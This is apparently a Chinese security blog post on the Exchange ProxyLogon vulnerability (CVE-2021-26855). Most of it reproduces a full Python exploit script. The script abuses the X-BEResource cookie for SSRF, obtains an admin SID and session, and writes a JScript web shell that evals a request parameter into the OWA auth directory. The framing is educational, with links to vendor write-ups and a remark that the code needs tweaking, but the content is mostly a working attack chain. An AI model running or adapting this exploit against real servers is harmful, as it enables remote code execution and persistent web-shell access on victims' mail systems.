Exchange最新RCE利用EXP已放出

gclome

原文链接：Exchange最新RCE利用EXP已放出

前言

前段时间exchange的RCE（CVE-2021-26855）漏洞炒的沸沸扬扬，orange也被推上风口浪尖都快有阴谋论的八卦味道了。不过不管他，今天早上起来看到crazyman师傅在星球发了老外写的利用exp，就知道这事差不多可以公开了。少宇师傅更是一大早五点起床开始复现，真可怕（。
前后大概也就一周时间，我这种菜鸡就等着白嫖学习了。


正文
结合已经公开的资料，我们开始学习吧！

• 两篇学习资料
  
  
  

https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits/
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/

老外公开的exp

1. import requests
   
2. from urllib3.exceptions import InsecureRequestWarning
   
3. import random
   
4. import string
   
5. import sys
   
6. 
   
7. 
   
8. def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
   
9.     return ''.join(random.choice(chars) for _ in range(size))
   
10. 
    
11. if len(sys.argv) < 2:
    
12.   print("Usage: python PoC.py <target> <email>")
    
13.   print("Example: python PoC.py mail.evil.corp haxor@evil.corp")
    
14.   exit()
    
15. requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
    
16. target = sys.argv[1]
    
17. email = sys.argv[2]
    
18. random_name = id_generator(3) + ".js"
    
19. user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
    
20. 
    
21. shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ahihi.aspx"
    
22. shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
    
23. 
    
24. shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["exec_code"],"unsafe");}</script>'
    
25. legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a"
    
26. autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    
27.     <Request>
    
28.       <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
    
29.     </Request>
    
30. </Autodiscover>
    
31. """ % email
    
32. 
    
33. print("Attacking target " + target)
    
34. print("=============================")
    
35. print(legacyDnPatchByte.decode('hex'))
    
36. FQDN = "EXCHANGE"
    
37. ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
    
38.                                                                         "User-Agent": user_agent},
    
39.                   verify=False)
    
40. if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
    
41.     FQDN = ct.headers["X-FEServer"]
    
42. 
    
43. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    
44.     "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
    
45.     "Content-Type": "text/xml",
    
46.     "User-Agent": user_agent},
    
47.                    data=autoDiscoverBody,
    
48.                    verify=False
    
49.                    )
    
50. if ct.status_code != 200:
    
51.     print("Autodiscover Error!")
    
52.     exit()
    
53. if "<LegacyDN>" not in ct.content:
    
54.     print("Can not get LegacyDN!")
    
55.     exit()
    
56. 
    
57. legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0]
    
58. print("Got DN: " + legacyDn)
    
59. 
    
60. mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
    
61. 
    
62. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    
63.     "Cookie": "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
    
64.     "Content-Type": "application/mapi-http",
    
65.     "User-Agent": user_agent
    
66. },
    
67.                    data=mapi_body,
    
68.                    verify=False
    
69.                    )
    
70. if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.content:
    
71.     print("Mapi Error!")
    
72.     exit()
    
73. 
    
74. sid = ct.content.split("with SID ")[1].split(" and MasterAccountSid")[0]
    
75. 
    
76. print("Got SID: " + sid)
    
77. 
    
78. proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
    
79. """ % sid
    
80. 
    
81. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    
82.     "Cookie": "X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
    
83.     "Content-Type": "text/xml",
    
84.     "User-Agent": user_agent
    
85. },
    
86.                    data=proxyLogon_request,
    
87.                    verify=False
    
88.                    )
    
89. if ct.status_code != 241 or not "set-cookie" in ct.headers:
    
90.     print("Proxylogon Error!")
    
91.     exit()
    
92. 
    
93. sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
    
94. 
    
95. msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
    
96. print("Got session id: " + sess_id)
    
97. print("Got canary: " + msExchEcpCanary)
    
98. 
    
99. ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={
    
100.     "Cookie": "X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
     
101.         FQDN, sess_id, msExchEcpCanary),
     
102.     "User-Agent": user_agent
     
103. },
     
104.                   verify=False
     
105.                   )
     
106. if ct.status_code != 200:
     
107.     print("Wrong canary!")
     
108.     print("Sometime we can skip this ...")
     
109. rbacRole = ct.content.split("RBAC roles:</span> <span class='diagTxt'>")[1].split("</span>")[0]
     
110. # print "Got rbacRole: "+ rbacRole
     
111. 
     
112. print("=========== It means good to go!!!====")
     
113. 
     
114. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
     
115.     "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
     
116.         FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
     
117.     "Content-Type": "application/json; charset=utf-8",
     
118.     "User-Agent": user_agent
     
119. 
     
120. },
     
121.                    json={"filter": {
     
122.                        "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
     
123.                                       "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}},
     
124.                    verify=False
     
125.                    )
     
126. if ct.status_code != 200:
     
127.     print("GetOAB Error!")
     
128.     exit()
     
129. oabId = ct.content.split('"RawIdentity":"')[1].split('"')[0]
     
130. print("Got OAB id: " + oabId)
     
131. 
     
132. oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
     
133.             "properties": {
     
134.                 "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
     
135.                                "ExternalUrl": "http://ffff/#%s" % shell_content}}}
     
136. 
     
137. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
     
138.     "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
     
139.         FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
     
140.     "Content-Type": "application/json; charset=utf-8",
     
141.     "User-Agent": user_agent
     
142. },
     
143.                    json=oab_json,
     
144.                    verify=False
     
145.                    )
     
146. if ct.status_code != 200:
     
147.     print("Set external url Error!")
     
148.     exit()
     
149. 
     
150. reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
     
151.                   "properties": {
     
152.                       "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
     
153.                                      "FilePathName": shell_absolute_path}}}
     
154. 
     
155. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
     
156.     "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
     
157.         FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
     
158.     "Content-Type": "application/json; charset=utf-8",
     
159.     "User-Agent": user_agent
     
160. },
     
161.                    json=reset_oab_body,
     
162.                    verify=False
     
163.                    )
     
164. 
     
165. if ct.status_code != 200:
     
166.     print("Write Shell Error!")
     
167.     exit()
     
168. 
     
169. print("Successful!")

复制代码

PS：exp不可以直接利用，需要自己结合资料进行修改。有几个地方写死了，这边提个彩蛋：

1. legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a"
   
2. …………
   
3. print("Attacking target " + target)
   
4. print("=============================")
   
5. print(legacyDnPatchByte.decode('hex'))

复制代码

这里打印出来的是一张照片链接：

​
​
可以看到是嘲讽我们JB小子太菜了（

结语
好好学习叭